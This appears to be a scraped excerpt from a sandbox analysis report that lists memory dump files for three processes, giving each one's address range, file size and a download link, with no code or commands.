                      • memory/4540-107-0x00000000060D0000-0x00000000060EE000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/4540-95-0x0000000005B20000-0x0000000005E74000-memory.dmp

                        Filesize

                        3.3MB

                        Download

                      • memory/4540-77-0x0000000005830000-0x0000000005852000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/4540-71-0x0000000005200000-0x0000000005828000-memory.dmp

                        Filesize

                        6.2MB

                        Download

                      • memory/4540-73-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4540-68-0x0000000002B00000-0x0000000002B36000-memory.dmp

                        Filesize

                        216KB

                        Download

                      • memory/4540-69-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4540-67-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4544-111-0x00000000740D0000-0x000000007411C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/4544-75-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4544-155-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4544-147-0x0000000007A70000-0x0000000007A8A000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/4544-146-0x0000000007980000-0x0000000007994000-memory.dmp

                        Filesize

                        80KB

                        Download

                      • memory/4544-74-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4544-136-0x0000000007D80000-0x00000000083FA000-memory.dmp

                        Filesize

                        6.5MB

                        Download

                      • memory/4544-137-0x0000000007740000-0x000000000775A000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/4544-133-0x00000000073F0000-0x0000000007493000-memory.dmp

                        Filesize

                        652KB

                        Download

                      • memory/4544-121-0x0000000006910000-0x000000000692E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/4544-109-0x000000007F590000-0x000000007F5A0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4544-110-0x0000000006930000-0x0000000006962000-memory.dmp

                        Filesize

                        200KB

                        Download

                      • memory/4544-76-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4828-144-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4828-268-0x00000000053E0000-0x00000000053F0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4828-267-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4828-156-0x00000000053E0000-0x00000000053F0000-memory.dmp

                        Filesize

                        64KB

                        Download